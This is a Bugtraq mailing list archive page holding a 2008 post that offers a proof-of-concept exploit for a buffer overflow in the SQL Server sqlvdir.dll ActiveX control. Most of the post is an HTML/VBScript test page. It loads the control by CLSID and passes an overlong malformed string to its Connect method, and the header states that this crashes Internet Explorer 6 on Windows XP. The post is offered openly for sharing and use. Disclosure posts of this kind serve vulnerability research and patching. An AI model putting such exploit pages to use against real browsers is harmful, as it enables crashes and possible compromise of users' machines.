Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

sqlvdir.dll ActiveX Remote Buffer Overflow Exploit
From: beenudel1986 () gmail com
Date: Thu, 11 Sep 2008 04:21:06 -0600
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al    # 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                # 
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: Beenu Arora 
# 
# Home  : www.BeenuArora.com 
# 
# Email : beenudel1986 () gmail com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit 
# 
# Successfull exploitation crashes the Browser 
# 
# Tested On : WinXp Sp-2 IE 6.0 
# 
################################################# 
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll 
# Class SQLVDirControl 
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038} 
# Number of Interfaces: 1 
# Default Interface: ISQLVDirControl 
# RegKey Safe for Script: False 
# RegkeySafe for Init: False 
# KillBitSet: False 
################################################# 
 
 
<html> 
Test Exploit page 
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object> 
<script language='vbscript'> 
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll" 
prototype  = "Sub Connect ( [ ByVal szServer As Variant ] ,  [ ByVal szWebSite As Variant ] )" 
memberName = "Connect" 
progid     = "SQLVDIRLib.SQLVDirControl" 
argCount   = 2 
arg1="defaultV" 
arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te () st\tes\test\test\tes \ttest\test\test\tes\test\test\te 
s\ttest\test\test\tes\test\te 
st\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te () st\tes\test\test\tes 
\ttest\test\test\tes\test\test\te s\ttest\test 
\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te () st\tes\test\test\tes 
\ttest\test\test\tes\test\tes 
t\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te () 
st\tes\test\test\tes \ttest\test\ 
test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\" 
 
target.Connect arg1 ,arg2 
 
</script>

  By Date           By Thread  

Current thread:
  • sqlvdir.dll ActiveX Remote Buffer Overflow Exploit beenudel1986 (Sep 11)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]